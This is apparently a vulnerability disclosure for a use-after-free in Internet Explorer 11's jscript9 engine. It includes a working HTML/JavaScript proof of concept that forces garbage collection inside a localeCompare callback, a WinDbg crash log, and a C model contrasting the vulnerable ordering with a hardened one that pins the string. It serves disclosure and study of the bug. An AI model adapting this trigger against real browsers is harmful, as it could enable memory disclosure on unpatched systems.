There is a use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure.
This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.
PoC:
```
<!-- saved from url=(0014)about:internet -->
<script>
var vars = new Array(2);
function main() {
  // Large array; its string conversion is a long run of commas.
  vars[0] = new Array(1000000);
  // substr() coerces the array to a string and keeps a substring of it.
  vars[1] = String.prototype.substr.call(vars[0], 100);
  // Argument object whose toString runs script in the middle of the built-in.
  var o = {}; o.toString = f8;
  String.prototype.localeCompare.call(vars[1], o);
}
function f8(arg7, arg8, arg9) {
  // Runs while localeCompare is coercing its argument; forces a collection.
  alert(vars[1]);
  CollectGarbage();
}
main();
</script>
```
Debug log:
```
(cd8.f10): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6ccdaf9c ebx=00000000 ecx=0dd800d8 edx=00000009 esi=0a05bad4 edi=00d63ee0
eip=74ec3ced esp=0a05ba84 ebp=0a05bab8 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
kernel32!LongCompareString+0x153:
74ec3ced 668b11 mov dx,word ptr [ecx] ds:002b:0dd800d8=????
0:008> r
eax=6ccdaf9c ebx=00000000 ecx=0dd800d8 edx=00000009 esi=0a05bad4 edi=00d63ee0
eip=74ec3ced esp=0a05ba84 ebp=0a05bab8 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
kernel32!LongCompareString+0x153:
74ec3ced 668b11 mov dx,word ptr [ecx] ds:002b:0dd800d8=????
0:008> k
# ChildEBP RetAddr
00 0a05bab8 74ec389e kernel32!LongCompareString+0x153
01 0a05bb64 76246d2f kernel32!SortCompareString+0x1bc
02 0a05bb8c 76233081 KERNELBASE!SortCompareString+0x52
03 0a05bbb8 6cfbd23f KERNELBASE!CompareStringW+0x38
04 0a05bc00 6cc56a49 jscript9!Js::JavascriptString::EntryLocaleCompare+0x18f
05 0a05bc4c 6cce4ad1 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
06 0a05bc70 6cc612fb jscript9!Js::JavascriptFunction::EntryCall+0x95
07 0a05be78 6cc61689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
08 0a05bfac 09410fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
WARNING: Frame IP not in any known module. Following frames may be wrong.
09 0a05bfb8 6cc612fb 0x9410fe1
0a 0a05c1b8 6cc61689 jscript9!Js::InterpreterStackFrame::Process+0xc6d
0b 0a05c2cc 09410fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x200
0c 0a05c2d8 6cc56a49 0x9410fe9
0d 0a05c31c 6cc56f78 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91
0e 0a05c390 6cc56ead jscript9!Js::JavascriptFunction::CallRootFunction+0xb5
0f 0a05c3d8 6cc56e40 jscript9!ScriptSite::CallRootFunction+0x42
10 0a05c424 6cd645cf jscript9!ScriptSite::Execute+0xd2
11 0a05c4ac 6cd638ee jscript9!ScriptEngine::ExecutePendingScripts+0x1c6
12 0a05c540 6cd64e0a jscript9!ScriptEngine::ParseScriptTextCore+0x300
13 0a05c590 6dd85fd8 jscript9!ScriptEngine::ParseScriptText+0x5a
14 0a05c5c8 6da33f88 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
15 0a05c620 6dd2c88f MSHTML!CJScript9Holder::ParseScriptText+0x5f
16 0a05c690 6da342a7 MSHTML!CScriptCollection::ParseScriptText+0x175
17 0a05c77c 6da3495d MSHTML!CScriptData::CommitCode+0x31e
18 0a05c7fc 6da352ac MSHTML!CScriptData::Execute+0x232
19 0a05c81c 6dd5b156 MSHTML!CHtmScriptParseCtx::Execute+0xed
1a 0a05c870 6d77b11e MSHTML!CHtmParseBase::Execute+0x201
1b 0a05c88c 6d77ab57 MSHTML!CHtmPost::Broadcast+0x182
1c 0a05c9c4 6d80bc2d MSHTML!CHtmPost::Exec+0x617
1d 0a05c9e4 6d80bb93 MSHTML!CHtmPost::Run+0x3d
1e 0a05ca00 6d9f9a4e MSHTML!PostManExecute+0x61
1f 0a05ca14 6d9fa128 MSHTML!PostManResume+0x7b
20 0a05ca44 6d9ee272 MSHTML!CHtmPost::OnDwnChanCallback+0x38
21 0a05ca5c 6d6d604e MSHTML!CDwnChan::OnMethodCall+0x2f
22 0a05caac 6d6d5b9a MSHTML!GlobalWndOnMethodCall+0x16c
23 0a05cb00 759f62fa MSHTML!GlobalWndProc+0x103
24 0a05cb2c 759f6d3a user32!InternalCallWinProc+0x23
25 0a05cba4 759f77c4 user32!UserCallWinProcCheckWow+0x109
26 0a05cc04 759f788a user32!DispatchMessageWorker+0x3b5
27 0a05cc14 6eadabdc user32!DispatchMessageW+0xf
28 0a05fde0 6eb0ecb8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
29 0a05fea0 755b971c IEFRAME!LCIETab_ThreadProc+0x3e7
2a 0a05feb8 74513a31 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c
2b 0a05fef0 74ec336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94
2c 0a05fefc 775d98f2 kernel32!BaseThreadInitThunk+0xe
2d 0a05ff3c 775d98c5 ntdll!__RtlUserThreadStart+0x70
2e 0a05ff54 00000000 ntdll!_RtlUserThreadStart+0x1b
```
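As an added illustration (not part of the original report, and not jscript9 code), the following C model shows the hazard class this PoC exercises: a native built-in holds a raw pointer to a string buffer across a user-controlled toString callback that can trigger garbage collection, which is the shape suggested by the EntryLocaleCompare to CompareStringW frames above. The report does not establish the exact jscript9 root cause; the model's string object, root stack, collector and poison-on-collect are constructed so the stale read is observable rather than undefined behaviour.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Constructed model (not jscript9): an engine string and a toy collector with
 * an explicit root stack.  Collected buffers are poisoned, not freed, for observability. */
typedef struct { char *buf; bool live; } Str;
typedef void (*to_string_cb)(void);     /* user toString(): may run gc() */
#define MAX_OBJS 64
static Str *heap[MAX_OBJS];  static int nheap;
static Str *roots[MAX_OBJS]; static int nroots;
static Str *str_new(const char *s) {
    Str *o = malloc(sizeof *o); size_t n = strlen(s) + 1;
    o->buf = malloc(n); memcpy(o->buf, s, n); o->live = true;
    heap[nheap++] = o; return o;
}
/* Collect every live object that is not on the root stack. */
static void gc(void) {
    for (int i = 0; i < nheap; i++) {
        bool rooted = false;
        for (int j = 0; j < nroots; j++) rooted |= (roots[j] == heap[i]);
        if (rooted || !heap[i]->live) continue;
        heap[i]->live = false; memset(heap[i]->buf, '#', strlen(heap[i]->buf)); /* poison */
    }
}
/* Vulnerable ordering: a temporary reachable only from this native frame,
 * held as a raw pointer while user script runs (cf. f8 -> CollectGarbage). */
static int locale_compare_vuln(const char *self, const char *arg, to_string_cb cb) {
    Str *tmp = str_new(self);
    const char *p = tmp->buf;   /* raw pointer, invisible to the collector */
    cb();                       /* ToString(arg): arbitrary script, may gc() */
    return strcmp(p, arg);      /* cf. CompareStringW reading the collected buffer */
}
/* Hardened ordering: root the temporary for as long as its buffer is in use. */
static int locale_compare_fixed(const char *self, const char *arg, to_string_cb cb) {
    Str *tmp = str_new(self);
    roots[nroots++] = tmp;      /* pin across the callback */
    cb();
    int r = strcmp(tmp->buf, arg);
    nroots--;                   /* unpin only after the last use */
    return r;
}
static void evil_to_string(void) { gc(); }   /* models f8() calling CollectGarbage() */
int main(void) {
    printf("fixed=%d vuln=%d\n", locale_compare_fixed("abc", "abc", evil_to_string),
           locale_compare_vuln("abc", "abc", evil_to_string));
    return 0;
}
```

The pinned version compares equal strings as equal after the callback; the unpinned version compares against the poisoned buffer, which is the model's stand-in for the `????` read at `kernel32!LongCompareString`.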